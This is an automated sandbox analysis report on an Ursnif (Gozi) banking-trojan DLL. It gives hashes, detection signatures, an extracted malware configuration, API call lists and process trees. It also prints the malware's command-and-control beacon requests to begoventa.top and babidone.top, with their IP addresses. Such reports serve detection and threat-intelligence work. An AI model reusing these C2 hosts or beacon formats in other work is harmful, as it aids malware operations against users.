Analysis Report zQ32b1FVcL.dll

Overview

General Information

Sample Name: zQ32b1FVcL.dll
Analysis ID: 338663
MD5: eed4174c8a96dd7b611d9f109c71e20f
SHA1: c471724d86fd269a19932280361ca52e1e294f19
SHA256: e5dc940537146c1c56b8a8f91234484c83223943c13d2fbf354f0cfdec13c258
Tags: dllGozi

Most interesting Screenshot:

Detection

Ursnif
Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Ursnif
Writes or reads registry keys via WMI
Writes registry values via WMI
Antivirus or Machine Learning detection for unpacked file
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Detected potential crypto function
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
PE file contains strange resources
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

barindex
Found malware configuration
Source: loaddll32.exe.6132.1.memstr Malware Configuration Extractor: Ursnif {"server": "12", "whoami": "user@320946", "dns": "320946", "version": "250171", "uptime": "266", "crc": "1", "id": "5533", "user": "253fc4ee08f8d2d8cdc8873aab08ddd5", "soft": "2"}
Antivirus or Machine Learning detection for unpacked file
Source: 1.2.loaddll32.exe.cc0000.2.unpack Avira: Label: TR/Crypt.XPACK.Gen8
Source: 1.2.loaddll32.exe.10000000.4.unpack Avira: Label: TR/Crypt.XPACK.Gen8

Compliance:

barindex
Uses 32bit PE files
Source: zQ32b1FVcL.dll Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00CF523C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 1_2_00CF523C
Source: global traffic HTTP traffic detected: GET /images/FYBARzKsgpw7r/GeKZtzzc/xoDGsIA1G8WlOKnsrCv_2F5/ejqDaRsnD5/ZD4RH6oQdxqfB9mxw/6WnzZpVL425M/CKmLBjBrvSn/f81OVwTXuZJrQZ/ja96eHVtqviz347i3JPx7/5Q6Nnj7RuUGPOFSU/4_2BMMGnBKrRLtO/P_2FyE_2BfezXukLEe/1gUCCjKEM/NO_2BQ8BNJkX/Zge.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: begoventa.topConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: begoventa.topConnection: Keep-Alive
Source: msapplication.xml0.16.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x482e4b07,0x01d6e951</date><accdate>0x482e4b07,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.16.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x482e4b07,0x01d6e951</date><accdate>0x482e4b07,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.16.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x48330f3c,0x01d6e951</date><accdate>0x48330f3c,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.16.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x48330f3c,0x01d6e951</date><accdate>0x48330f3c,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.16.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x483571cf,0x01d6e951</date><accdate>0x483571cf,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.16.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x483571cf,0x01d6e951</date><accdate>0x4837d4a4,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: babidone.top
Source: {8CB598BC-5544-11EB-90E4-ECF4BB862DED}.dat.24.dr String found in binary or memory: http://babidone.top/images/tA_2BVY2gpEVQoau7_/2F_2Fif0j/qHSdUWFKPJWkX50svEcy/JM_2Bha3oNIg2DGHFKu/s3R
Source: loaddll32.exe, 00000001.00000002.590862827.0000000001260000.00000002.00000001.sdmp String found in binary or memory: http://begoventa.top/images/FYBARzKsgpw7r/GeKZtzzc/xoDGsIA1G8WlOKnsrCv_2F5/ejqDaRsnD5/ZD4RH6oQd
Source: {B10F0CC6-5544-11EB-90E4-ECF4BB862DED}.dat.34.dr String found in binary or memory: http://begoventa.top/images/FYBARzKsgpw7r/GeKZtzzc/xoDGsIA1G8WlOKnsrCv_2F5/ejqDaRsnD5/ZD4RH6oQdxqfB9
Source: zQ32b1FVcL.dll String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: zQ32b1FVcL.dll String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: zQ32b1FVcL.dll String found in binary or memory: http://ocsp.sectigo.com0
Source: msapplication.xml.16.dr String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.16.dr String found in binary or memory: http://www.google.com/
Source: msapplication.xml2.16.dr String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.16.dr String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.16.dr String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.16.dr String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.16.dr String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.16.dr String found in binary or memory: http://www.youtube.com/
Source: loaddll32.exe, 00000001.00000002.589354244.000000000050B000.00000004.00000020.sdmp String found in binary or memory: https://babidone.top/images/SD1b2IxKgGl/yu82lOMR21XtBT/D978a7t2zaVGKWj8Jhn4X/WcqZuBMBlmeeUEpv/9Sv89p
Source: zQ32b1FVcL.dll String found in binary or memory: https://sectigo.com/CPS0D
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.303180413.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303205645.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.302945060.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303072523.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303036485.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.302845992.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.591350377.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303010833.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303117277.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6132, type: MEMORY

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.303180413.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303205645.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.302945060.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303072523.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303036485.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.302845992.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.591350377.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303010833.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303117277.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6132, type: MEMORY

System Summary:

barindex
Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_10001812 NtMapViewOfSection, 1_2_10001812
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_10001DD0 GetProcAddress,NtCreateSection,memset, 1_2_10001DD0
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_100022E5 NtQueryVirtualMemory, 1_2_100022E5
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00CF9932 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 1_2_00CF9932
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00CFB2C1 NtQueryVirtualMemory, 1_2_00CFB2C1
Detected potential crypto function
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_100020C4 1_2_100020C4
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00CFB09C 1_2_00CFB09C
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00CFEC48 1_2_00CFEC48
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00CFEC41 1_2_00CFEC41
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00CF99FC 1_2_00CF99FC
PE / OLE file has an invalid certificate
Source: zQ32b1FVcL.dll Static PE information: invalid certificate
PE file contains strange resources
Source: zQ32b1FVcL.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: zQ32b1FVcL.dll Binary or memory string: OriginalFilename360SkinView.exeF vs zQ32b1FVcL.dll
Uses 32bit PE files
Source: zQ32b1FVcL.dll Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
Source: classification engine Classification label: mal64.troj.winDLL@13/44@4/3
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00CF244A CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 1_2_00CF244A
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\~DFD53763C3DA639732.TMP Jump to behavior
Source: zQ32b1FVcL.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\zQ32b1FVcL.dll'
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6388 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1140 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3288 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3984 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6388 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1140 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3288 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3984 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior

Data Obfuscation:

barindex
PE file contains sections with non-standard names
Source: zQ32b1FVcL.dll Static PE information: section name: .data2
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_100020B3 push ecx; ret 1_2_100020C3
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_10002060 push ecx; ret 1_2_10002069
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00CFACD0 push ecx; ret 1_2_00CFACD9
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00CFB08B push ecx; ret 1_2_00CFB09B
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00C81830 push edx; ret 1_2_00C81934
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00C644CE push edx; ret 1_2_00C644CF
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00C611C0 push eax; iretd 1_2_00C611D6
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00C615D6 push ecx; ret 1_2_00C615D7
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00C63DFA push ecx; retf 1_2_00C63E01
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00C65116 pushad ; ret 1_2_00C65129
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00C63E99 push FFFFFFCFh; retf 1_2_00C63EC7
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00C63A4D push 92BB463Fh; iretd 1_2_00C63A52
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00C643F7 push ss; ret 1_2_00C643F8
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00C63F02 push dword ptr [edi+64h]; iretd 1_2_00C63F0C

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.303180413.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303205645.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.302945060.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303072523.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303036485.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.302845992.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.591350377.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303010833.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303117277.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6132, type: MEMORY
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\loaddll32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00CF523C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 1_2_00CF523C
Source: loaddll32.exe, 00000001.00000002.589296510.00000000004F9000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAWH
Source: C:\Windows\System32\loaddll32.exe Memory protected: page execute read | page guard Jump to behavior
Source: loaddll32.exe, 00000001.00000002.590862827.0000000001260000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: loaddll32.exe, 00000001.00000002.590862827.0000000001260000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000001.00000002.590862827.0000000001260000.00000002.00000001.sdmp Binary or memory string: Progman
Source: loaddll32.exe, 00000001.00000002.590862827.0000000001260000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00CF5DC6 cpuid 1_2_00CF5DC6
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_100019C7 GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,GetLastError,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 1_2_100019C7
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00CF5DC6 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 1_2_00CF5DC6
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_10001799 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 1_2_10001799

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.303180413.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303205645.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.302945060.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303072523.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303036485.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.302845992.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.591350377.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303010833.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303117277.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6132, type: MEMORY

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.303180413.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303205645.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.302945060.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303072523.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303036485.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.302845992.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.591350377.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303010833.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303117277.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6132, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 338663 Sample: zQ32b1FVcL.dll Startdate: 12/01/2021 Architecture: WINDOWS Score: 64 33 Found malware configuration 2->33 35 Yara detected  Ursnif 2->35 6 loaddll32.exe 7 2->6         started        10 iexplore.exe 1 50 2->10         started        12 iexplore.exe 1 50 2->12         started        14 2 other processes 2->14 process3 dnsIp4 29 babidone.top 6->29 37 Writes or reads registry keys via WMI 6->37 39 Writes registry values via WMI 6->39 31 192.168.2.1 unknown unknown 10->31 16 iexplore.exe 28 10->16         started        19 iexplore.exe 31 12->19         started        21 iexplore.exe 36 14->21         started        23 iexplore.exe 31 14->23         started        signatures5 process6 dnsIp7 25 begoventa.top 47.91.89.242, 49746, 49747, 80 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC United States 16->25 27 babidone.top 193.56.255.166, 443, 80 INFOCLOUD-SRLMD Romania 19->27
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
193.56.255.166
 unknown Romania
213137 INFOCLOUD-SRLMD false
47.91.89.242
 unknown United States
45102 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC false

Private
IP
192.168.2.1

Contacted Domains

Name IP Active
begoventa.top 47.91.89.242 true
babidone.top 193.56.255.166 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://begoventa.top/favicon.ico false
  • Avira URL Cloud: safe
 unknown
http://begoventa.top/images/FYBARzKsgpw7r/GeKZtzzc/xoDGsIA1G8WlOKnsrCv_2F5/ejqDaRsnD5/ZD4RH6oQdxqfB9mxw/6WnzZpVL425M/CKmLBjBrvSn/f81OVwTXuZJrQZ/ja96eHVtqviz347i3JPx7/5Q6Nnj7RuUGPOFSU/4_2BMMGnBKrRLtO/P_2FyE_2BfezXukLEe/1gUCCjKEM/NO_2BQ8BNJkX/Zge.avi false
  • Avira URL Cloud: safe
 unknown